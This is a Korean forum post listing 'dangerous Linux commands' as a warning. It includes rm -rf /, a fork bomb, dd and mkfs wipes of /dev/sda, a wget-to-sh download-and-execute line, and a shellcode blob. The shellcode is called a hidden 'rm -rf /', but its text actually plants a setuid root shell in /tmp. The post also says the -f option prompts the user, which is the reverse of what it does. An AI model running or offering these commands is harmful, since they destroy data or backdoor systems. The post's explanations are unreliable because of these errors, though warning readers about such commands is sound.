해커즈뉴스 / 해커대학
 
 


해커즈뉴스 제공 리눅스 + 스마트폰의 모든것
 
 
No, 5939
구분: 활용팁
사이트: 해커즈뉴스
종류: 리눅스
조회: 101
위험한 리눅스 명령어 몇개~  
( 1 ) rm -rf



묻지도 따지지도 않고 하위폴더 포함해서 삭제하는 명령어임.

윈도우 Shift+Delete 눌러서 삭제하는 거랑 똑같음.

복구하기 힘들며 가급적이면 i 옵션을 넣어서 삭제하자!



-r 옵션 : 하위 디렉토리를 포함하여 모든 내용 삭제

-f 옵션 : 파일/디렉토리 삭제시 사용자에게 지울 지 메시지 출력하는 옵션



ex. rm -rf / : 루트 디렉토리의 모든 항목 강제 삭제







( 2 ) :(){:|:&};:



:(){:|:&};: 명령어는 포트 폭탄(fork bomb)임.

포트 폭탄 명령어는 가변적으로 작성할 수 있으며 여기서 ':' 문자는 함수를 선언하며 이 함수가 자기 자신을 호출하며 그 결과값을 자기 자신에게 넘겨줌. 포그라운드로 한번 실행되고 그대로 끝나지 않고 프로세스로 남아있도록 백그라운드로 실행됨.

메모리가 100 % 되는 걸 보게 되며 한마디로 재귀 함수를 이용한 공격임.







( 3 ) command > /dev/sda



사용자가 입력한 명령어를 /dev/sda 에 쓰는 명령어로 /dev/sda 의 원본 데이터를 손상시킴.

보통 /dev/sda 는 메인 하드 디스크임.







( 4 ) mv folder /dev/null



/dev/null 장치는 널 디바이스(null device)로 불리우며 리눅스 상에서 블랙홀과 같음.

기록 대상이 되는 모든 데이터를 버리지만 쓰기 작업은 성공했다고 보고하는 장치 파일임.

위 명령어를 통해서 사용자가 지정한 폴더를 /dev/null 로 옮기라는 명령어지만 지정한 폴더는 찾을 수 없음. ㅠㅠ

지워버리는 거나 똑같음.



ex. mv /home/user/* /dev/null : 특정 사용자의 모든 폴더나 파일을 /dev/null 로 옮겨서 파괴시킴.







( 5 ) wget hxxp://malicious_source -O- | sh



위 명령어는 악성코드에서 주로 볼 수 있는 명령어로 악의적인 소스를 다운로드 후 실행시키는 명령어임.







( 6 ) mkfs.ext3 /dev/sda



위 명령어는 sda 형식을 지정하는 명령어로 하드 디스크 드라이브가 NEW 로 표시되며 데이터가 없고 복구할 수 없는 시스템 단계가 됨.







( 7 ) > file



지정한 파일에 덮어쓰는 명령어로 파일의 원본 데이터를 손상시킴.







( 8 ) ^foo^bar



위 명령어는 전체 명령를 입력하지 않고 이전 실행 명령을 편집하는데 사용되는 명령어로 정말로 위험할 수 있음.







( 9 ) dd if=/dev/random of=/dev/sda



위 명령어는 /dev/sda 를 지우고 임의의 쓰레기값으로 작성하는 명령어임.

시스템을 복구 불가능하게 만듬.







( 10 ) 쉘코드로 짜여진 코드



아래 예제 코드는 "rm -rf /" 명령어를 쉘코드로 짠 코드로 감지하기가 쉽지 않음.



char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;


                    수정/삭제     다음글    
번호제 목종류작성일
5939   위험한 리눅스 명령어 몇개~ 리눅스  04-25
5938   “쉽게 따라하는” 크롬 OS에서 리눅스 앱 사용하... 리눅스  04-24
5937   CIO가 주목할 만한 영국 태생 오픈소스 5선 오픈소스  04-23
5936   ipmi란? 리눅스  04-22
5935   wget 명령어 통해 파일 간편하게 다운로드 하기 리눅스  04-21
5934   컨테이너 보안을 개선하는 방법 컨테이너  04-20
5933   구글 '비욘드코프', 리눅스 '인디'··· 온라인 ... 리눅스  04-19
5932   트럼프의 변심 “위키리크스에 대해 아는 것 없다... 해커  04-18
5931   미 행정부는 왜 위키리크스를 두려워하나.. 6대 대... 해커  04-17
5930   리눅스 실습 리눅스  04-16
 
 

 
다음       목록 홈